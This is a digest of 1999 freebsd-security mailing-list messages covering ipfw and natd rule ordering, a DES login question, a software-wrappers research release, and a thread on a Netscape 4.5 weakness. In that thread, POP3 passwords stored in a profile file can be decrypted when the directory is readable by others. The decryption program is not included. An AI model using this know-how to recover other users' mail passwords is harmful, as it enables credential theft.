robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id WAA17467; Thu, 8 Apr 1999 22:22:39 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 8 Apr 1999 22:22:39 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Matthew Dillon Cc: Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: <199904090133.SAA16835@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Matthew Dillon wrote: > :Forwarded by Foxfair Hu > :---------------- Original message follows ---------------- > : From: Alexey Pavlov > : To: BUGTRAQ@netspace.org > : Date: Thu, 8 Apr 1999 21:12:27 +0400 > : Subject: Netscape 4.5 vulnerability > :-- > : > :I found method how to get users passwords from Netscape 4.5 for FreeBSD > : ~user/.netscape/liprefs.js file. This file is used for storing user > :last > :session preferences .This file also contains encrypted password for > :pop3. > :Not like a DES , this encryption can be decrypted. As a result of many > :experiments i wrote this program. It gives me almost all passwords in my > : system, because all people use Netscape. > :Here is src of this decryption programm: > > The 'security hole' is that netscape doesn't make the .netscape > directory 700. I'd report it to netscape. I dunno whether they > will do anything about it, though. Huh. Didn't do that for me; mine is safely readable and writable only for my uid. And there are a lot of posts to bugtraq about programs that store passwords unencrypted and it always surprises me that people are still complaining about it :-). As you suggest, the real issue is the access control used to protect the data object, which in Windows are nil, of course. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 20:49:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from jasper.somtel.com (jasper.somtel.com [206.139.114.254]) by hub.freebsd.org (Postfix) with ESMTP id 12D201579C for ; Thu, 8 Apr 1999 20:49:36 -0700 (PDT) (envelope-from darren@jasper.somtel.com) Received: from localhost (darren@localhost) by jasper.somtel.com (8.9.3/8.9.3) with ESMTP id XAA18719 for ; Thu, 8 Apr 1999 23:47:25 -0400 (EDT) Date: Thu, 8 Apr 1999 23:47:24 -0400 (EDT) From: Darren Henderson To: security@FreeBSD.ORG Subject: ipfw question regarding RFC1918 addresses In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Running ipfw and natd. I use the class A RFC1918 address for the internal network. The way things are set up ipfw first sends everything to divert, allows all localhost stuff then disallows the RFC1918 stuff with add deny all from 192.168.0.0:255.255.0.0 to any via ppp0 add deny all from any to 192.168.0.0:255.255.0.0 via ppp0 add deny all from 172.16.0.0:255.240.0.0 to any via ppp0 add deny log all from any to 172.16.0.0:255.240.0.0 via ppp0 add deny all from 10.0.0.0:255.0.0.0 to any via ppp0 #add deny all from any to 10.0.0.0:255.0.0.0 via ppp0 (There are a handful of additional rules). Notice that last line is commented out. If I include that natd appears to stop working. I'm guessing that divert is converting an incomming packet to 10.0.0.x and its then passing through my ruleset with its new address and being disallowed. The simple solution would seem to be to move the RFC1918 stuff above the divert rule... is that the best solution however? Have I even come close? The goal being to block 10.0.0.0/8 comming into the machine... ______________________________________________________________________ Darren Henderson darren@jasper.somtel.com Help fight junk e-mail, visit http://www.cauce.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 0:17: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsd.vniigazmain.gazprom.ru (a17.gazprom.ru [194.215.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 362B915470 for ; Fri, 9 Apr 1999 00:16:43 -0700 (PDT) (envelope-from smelekov@bsd.vniigazmain.gazprom.ru) Received: from vniigazmain.gazprom.ru by bsd.vniigazmain.gazprom.ru with ESMTP id LAA17722; (8.9.1/vak/1.9) Fri, 9 Apr 1999 11:08:19 +0400 (MSD) Message-ID: <370DAA59.7B3325E0@vniigazmain.gazprom.ru> Date: Fri, 09 Apr 1999 11:20:57 +0400 From: "Serguei V. Melekhov" Reply-To: smelekov@vniigazmain.gazprom.ru Organization: =?iso-8859-1?Q?=C4=CF?= "=?iso-8859-1?Q?=C2=CD=C8=C8=C3=C0=C7?=" =?iso-8859-1?Q?=CE=C0=CE?= "=?iso-8859-1?Q?=C3=C0=C7=CF=D0=CE=CC?=" X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: ru,en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: Ipfw related. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Security Users, Maybe i missed something... Well.. Just read text below and help if u can.;) Thanks in advance. Let me show you one thing: ipfw add xxxx deny all from my.host.com to evil.host.com - It denies packets from my.host.com to evil.host.com, but evil.host.com still can send packets to my.host.com. Decision: add another deny rule. But here is my question! Is there any other ways to deny packets in both sides (in and out) by writing only one ipfw rule? Reason: I have a very big ipfw rule table and just wanna optimize it in some way. -- Yours, Serguei V. Melekhov System Administrator of International Relations And Information Division All-Russian Scientific Research Institute of Natural Gases and Gas Technologies Tel. (095) 355-9165 Fax: (095) 399-1677 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 0:56:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 6D21914D74 for ; Fri, 9 Apr 1999 00:56:11 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA04597; Fri, 9 Apr 1999 09:54:07 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00409; Fri, 9 Apr 1999 09:53:35 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199904090753.JAA00409@CoDe.hu> Subject: Re: FreeBSD 2.2.8 and DES (again) In-Reply-To: <370CE733.C1C578E3@pro.via-rs.com.br> from Lauro Barbosa at "Apr 8, 99 02:28:20 pm" To: freebsd-security@freebsd.org Date: Fri, 9 Apr 1999 09:53:35 +0200 (CEST) Cc: lauro@pro.via-rs.com.br X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! > Hello Again! > Please, I need help. > I have a server with FreeBSD 2.2.8 and DES instaled. > In this server the users can to login using login_name or > login_name. > (whit dot at end). for example: john or john. > Anybody know this problem ? Sorry. I can reach only one 3.1R machine with DES, and it wasn't reproducible on it. > How can to correct this ? Bye, Gabor -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 1:51: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 83B0115311 for ; Fri, 9 Apr 1999 01:50:51 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id MAA27667; Fri, 9 Apr 1999 12:48:30 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 9 Apr 1999 12:48:22 +0400 Received: from undisclosed-intranet-sender id xma016358; Fri, 9 Apr 99 12:48:02 +0400 Date: Fri, 9 Apr 1999 12:47:57 +0400 Message-Id: <199904090847.MAA24024@paranoid.eltex.spb.ru> In-Reply-To: <199904082117.RAA13119@clipper.gw.tislabs.com> from "Mark S Feldman " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Generic Software Wrappers To: feldman@tislabs.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Is there a commercial/less restrictive license available? (if yes) how much does it cost? Mark S Feldman said : > > Almost 8 months back, I responded to a message on this list and > described a research project we were working on. My message is below. > At the end of the message, I said I would send another message to this > list when we made our source available. Well, the first release of > our Generic Software Wrappers Tool Kit -- still very much a research > prototype -- is available. It runs under FreeBSD 2.2.x, Solaris 2.6, > and, as much as we have ported to date, under Windows NT 4.0. We're > limited to FreeBSD 2.2.x because we don't currently have the resources > to port to 3.x. Check out ftp://ftp.tislabs.com/pub/wrappers if > you're interested. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNw2+vKH/mIJW9LeBAQGsqgP9EPQlfwV+OW3h/7UmBaKLWIiRPHIZycYI KYYytFsDeyJpP5cdSh/cj8f7mqbDektdh0iB3uBh+F2XP983f+mHOwL911GwFgsX /60owY/bVJFW50a17M5PEylQtX7fTy3TYeJltggpMgVymtILRI3WqZZdpefrmTbG NMFLKBrcAU8= =LTjC -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 4:18:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 6AA6014F9B; Fri, 9 Apr 1999 04:17:59 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.2/8.9.2/UCB) id OAA32087; Fri, 9 Apr 1999 14:13:45 +0300 (EEST) (envelope-from ru) Date: Fri, 9 Apr 1999 14:13:45 +0300 From: Ruslan Ermilov To: "Serguei V. Melekhov" Cc: freebsd-security@FreeBSD.ORG, luigi@FreeBSD.ORG Subject: Re: Ipfw related. Message-ID: <19990409141345.A31742@relay.ucb.crimea.ua> Mail-Followup-To: "Serguei V. Melekhov" , freebsd-security@FreeBSD.ORG, luigi@freebsd.org References: <370DAA59.7B3325E0@vniigazmain.gazprom.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <370DAA59.7B3325E0@vniigazmain.gazprom.ru>; from Serguei V. Melekhov on Fri, Apr 09, 1999 at 11:20:57AM +0400 X-Operating-System: FreeBSD 3.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 09, 1999 at 11:20:57AM +0400, Serguei V. Melekhov wrote: > Hello Security Users, > > Maybe i missed something... Well.. Just read text below and help if > u can.;) Thanks in advance. > > Let me show you one thing: > > ipfw add xxxx deny all from my.host.com to evil.host.com > > - It denies packets from my.host.com to evil.host.com, but > evil.host.com still can send packets to my.host.com. > > Decision: add another deny rule. But here is my question! > Is there any other ways to deny packets in both sides (in and out) > by writing only one ipfw rule? > No, not yet. Luigi had some plans (???) to implement ``between'' predicate, so you'd be able to write: ipfw add xxxx deny ip between my.host.com and evil.host.com -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 4:26:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 19DD21514D for ; Fri, 9 Apr 1999 04:26:01 -0700 (PDT) (envelope-from ks@chg.ru) Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.1/8.9.1) with ESMTP id PAA16738; Fri, 9 Apr 1999 15:22:08 +0400 (MSD) Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Fri, 09 Apr 1999 15:21:16 +0400 (MSD) Organization: Landau Institute for Theoretical Physics From: "Sergey S. Kosyakov" To: Darren Henderson Subject: RE: ipfw question regarding RFC1918 addresses Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Where is the place for divert rules? Check carefully, what do you want to do? And one more - the better rules will be: add deny all from 192.168.0.0/16 to any in recv ppp0 ... other deny rules ... add divert _port_ ip from any to any via _external_if_0_ add allow ip from any to any And start natd with "-u" flag. Sergey. On 09-Apr-99 Darren Henderson wrote: > > Running ipfw and natd. I use the class A RFC1918 address for the internal > network. > > The way things are set up ipfw first sends everything to divert, allows > all localhost stuff then disallows the RFC1918 stuff with > > add deny all from 192.168.0.0:255.255.0.0 to any via ppp0 > add deny all from any to 192.168.0.0:255.255.0.0 via ppp0 > add deny all from 172.16.0.0:255.240.0.0 to any via ppp0 > add deny log all from any to 172.16.0.0:255.240.0.0 via ppp0 > add deny all from 10.0.0.0:255.0.0.0 to any via ppp0 >#add deny all from any to 10.0.0.0:255.0.0.0 via ppp0 > > (There are a handful of additional rules). Notice that last line is > commented out. If I include that natd appears to stop working. I'm > guessing that divert is converting an incomming packet to 10.0.0.x and its > then passing through my ruleset with its new address and being disallowed. > The simple solution would seem to be to move the RFC1918 stuff above the > divert rule... is that the best solution however? Have I even come close? > > The goal being to block 10.0.0.0/8 comming into the machine... > > > ______________________________________________________________________ > Darren Henderson darren@jasper.somtel.com > > Help fight junk e-mail, visit http://www.cauce.org/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --- ---------------------------------- Sergey Kosyakov Laboratory of Distributed Computing Department of High-Performance Computing and Applied Network Research Landau Institute for Theoretical Physics E-Mail: ks@chg.ru Date: 09-Apr-99 Time: 15:14:50 ---------------------------------- --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 5:27:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id 62A5C14FEB for ; Fri, 9 Apr 1999 05:27:24 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id IAA18415; Fri, 9 Apr 1999 08:24:41 -0400 (EDT) Date: Fri, 9 Apr 1999 08:24:40 -0400 (EDT) From: Daniel Hagan To: Robert Watson Cc: Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Robert Watson wrote: > > The 'security hole' is that netscape doesn't make the .netscape > > directory 700. I'd report it to netscape. I dunno whether they > > will do anything about it, though. > > Huh. Didn't do that for me; mine is safely readable and writable only for > my uid. What's your umask? If you use umask 077, then this is what I would expect, but "typical" users who don't change it from 022 would probably end up with a 755 .netscape directory. Netscape should be smart enough to at least set the profile file to 600, if not the entire directory to 700. Daniel -- Daniel Hagan Computer Systems Engineer dhagan@cs.vt.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 5:42:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 669D5150E8 for ; Fri, 9 Apr 1999 05:42:48 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA19937; Fri, 9 Apr 1999 08:40:04 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 9 Apr 1999 08:40:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Daniel Hagan Cc: Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Daniel Hagan wrote: > On Thu, 8 Apr 1999, Robert Watson wrote: > > > > The 'security hole' is that netscape doesn't make the .netscape > > > directory 700. I'd report it to netscape. I dunno whether they > > > will do anything about it, though. > > > > Huh. Didn't do that for me; mine is safely readable and writable only for > > my uid. > > What's your umask? If you use umask 077, then this is what I would > expect, but "typical" users who don't change it from 022 would probably > end up with a 755 .netscape directory. Netscape should be smart enough to > at least set the profile file to 600, if not the entire directory to 700. Well, it's 077 on my multi-user machines, but 022 on the notebook which I tested on. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 6:52:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6BF1A15187 for ; Fri, 9 Apr 1999 06:52:48 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id JAA20218; Fri, 9 Apr 1999 09:50:38 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 9 Apr 1999 09:50:38 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Lauro Barbosa Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD 2.2.8 and DES In-Reply-To: <370AB13A.3F2A2042@pro.via-rs.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 6 Apr 1999, Lauro Barbosa wrote: > Hello! > Please, i need help. > I have a server with FreeBSD 2.2.8 and DES instaled. > In this server the users can to login using login_name or > login_name. > (whit dot at end). for example: john or john. > Anybody know this problem ? > How can to correct this ? > Sorry my poor english. > Please send me a answer in private to lauro@pro.via-rs.com.br, > thanks, Lauro, Sorry -- I'm not sure if you mean that you would like them to be able to log in as either `user' or `user.', or that they can and that is a problem. If you would like to change it so they can, my suspicion is that changes in PAM and getpwnam are the best place to do that, but it will probably require rebuilding a lot of stuff from source. I don't believe there is a way to create such a mapping without software modification. It is possible that adding two password entries for each uid, with and without a . in the username, would work, but password changing would probably be flaky, as possibly with other things. Using a third party authentication mechanism like Kerberos might work, especially since in traditional kerberos `user.' is already equivilent to `user', as `user.' and `user' both indicate a null instance. This would minimize required changes to the code base, perhaps. Making sure, though, to have the `user' entry appear first, and that the users aren't going to need to change their user information. It might be nice to have an /etc/useraliases that allows you to map names to other names, but I'm not sure it's generally desirable, and would introduce interoperability problems with other platforms. Does anyone else know of a way to do this? Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 7:45:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 1347214C40 for ; Fri, 9 Apr 1999 07:45:36 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id IAA27984; Fri, 9 Apr 1999 08:42:58 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <370E0336.83577BA7@softweyr.com> Date: Fri, 09 Apr 1999 07:40:06 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Daniel Hagan Cc: Robert Watson , Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Daniel Hagan wrote: > > On Thu, 8 Apr 1999, Robert Watson wrote: > > > > The 'security hole' is that netscape doesn't make the .netscape > > > directory 700. I'd report it to netscape. I dunno whether they > > > will do anything about it, though. > > > > Huh. Didn't do that for me; mine is safely readable and writable only for > > my uid. > > What's your umask? If you use umask 077, then this is what I would > expect, but "typical" users who don't change it from 022 would probably > end up with a 755 .netscape directory. Netscape should be smart enough to > at least set the profile file to 600, if not the entire directory to 700. My umask is 022 and my .netscape directory is 700. I didn't change it, so Netscape must have created it that way. This is Communicator 4.5 (linux version; it's more reliable than the FreeBSD binary) on 3.1. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 7:53:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.gw.tislabs.com (relay.gw.tislabs.com [192.94.214.100]) by hub.freebsd.org (Postfix) with ESMTP id 17B6615335 for ; Fri, 9 Apr 1999 07:53:02 -0700 (PDT) (envelope-from feldman@tislabs.com) Received: by relay.gw.tislabs.com; id LAA27714; Fri, 9 Apr 1999 11:01:53 -0400 (EDT) Received: from clipper.gw.tislabs.com(10.33.1.2) by relay.gw.tislabs.com via smap (4.1) id xma027663; Fri, 9 Apr 99 11:01:26 -0400 Received: from clipper.gw.tislabs.com (localhost [127.0.0.1]) by clipper.gw.tislabs.com (8.9.1/8.9.1) with ESMTP id KAA21446; Fri, 9 Apr 1999 10:49:54 -0400 (EDT) Message-Id: <199904091449.KAA21446@clipper.gw.tislabs.com> To: ark@eltex.ru Cc: feldman@tislabs.com, freebsd-security@freebsd.org Subject: Re: Generic Software Wrappers In-reply-to: Your message of "Fri, 09 Apr 1999 12:47:57 +0400." <199904090847.MAA24024@paranoid.eltex.spb.ru> Date: Fri, 09 Apr 1999 10:49:54 -0400 From: Mark S Feldman Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Is there a commercial/less restrictive license available? > (if yes) how much does it cost? There's no other license. At least, not yet. Since the current release is a research prototype (limited OS versions, expert-friendly, unoptimized, with more than a slight chance of bugs that could cause a kernel panic), the idea of paying for it may be a bit premature. The current license looks to be perfectly adequate for downloading and experimenting with the code. We're still working on our NT port and, as we write new wrappers and use the system on FreeBSD and Solaris, we will be fixing bugs and adding functionality. We'll probably be putting out another release in the next month or two. Our goals for distributing the code are to facilitate research and to see if there's interest in the technology. Mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 14:32:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id EA72615CFD for ; Fri, 9 Apr 1999 13:51:34 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id MAA21124; Fri, 9 Apr 1999 12:37:42 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 9 Apr 1999 12:37:42 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Wes Peters Cc: The Tech-Admin Dude , Daniel Hagan , Matthew Dillon , Foxfair Hu , freebsd-security@freebsd.org Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: <370E0826.FB33CE2@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Wes Peters wrote: > The Tech-Admin Dude wrote: > > > > On Fri, 9 Apr 1999, Wes Peters wrote: > > > > > My umask is 022 and my .netscape directory is 700. I didn't change it, > > > so Netscape must have created it that way. This is Communicator 4.5 > > > (linux version; it's more reliable than the FreeBSD binary) on 3.1. > > > > > I'm using the FreeBSD binary and it is only readable to my UID also, and I > > have not changed a thing.. One is not more reliable than the other, its > > the same code folks.. > > On 3.1, I cannot keep the FreeBSD binary running for more than a few seconds. > That's a notable difference to me, at least. It looks like Netscape does create the directory correctly, so as surmised, it looks like this is "yet another person complaing about encrypted passwords that need to be decryptable for the program to function"; unless of course there is a version of Netscape that doesn't do it right; evidence suggests otherwise. This conversation is rapdily leaving the realm of security; any followups on stability to -hackers please :-). Netscape 4.5 communicator seems fairly stable on my 4.0-CURRENT machine as of just pre-egcs; when I go heavily java, occasionally windows get stuck wherein I can't follow links; opening a new window and closing the old usually fixes that. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 14:33:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 188EC15CD9 for ; Fri, 9 Apr 1999 13:51:34 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id MAA21246; Fri, 9 Apr 1999 12:44:14 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 9 Apr 1999 12:44:14 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Mark S Feldman Cc: ark@eltex.ru, freebsd-security@freebsd.org Subject: Re: Generic Software Wrappers In-Reply-To: <199904091449.KAA21446@clipper.gw.tislabs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Mark S Feldman wrote: > > Is there a commercial/less restrictive license available? > > (if yes) how much does it cost? > > There's no other license. At least, not yet. Since the current > release is a research prototype (limited OS versions, expert-friendly, > unoptimized, with more than a slight chance of bugs that could cause a > kernel panic), the idea of paying for it may be a bit premature. The > current license looks to be perfectly adequate for downloading and > experimenting with the code. > > We're still working on our NT port and, as we write new wrappers and > use the system on FreeBSD and Solaris, we will be fixing bugs and > adding functionality. We'll probably be putting out another release > in the next month or two. Our goals for distributing the code are to > facilitate research and to see if there's interest in the technology. As I mentioned in a private mail to Mark and that I'll now mention in a public forum: in a few weeks after I've turned in my thesis and finished up a plethora of other projects, I'll look at porting the TISLabs code forward to 3.x/4.x. The work is of interest to me research-wise, at least, because it is a more general form of my freebsd tokens behavior which attempts to impose alternative security semantics on a traditional operating system; the PAG support in Arla is presumably similar in concept. Robert N Watson robert@fledge.watson.org 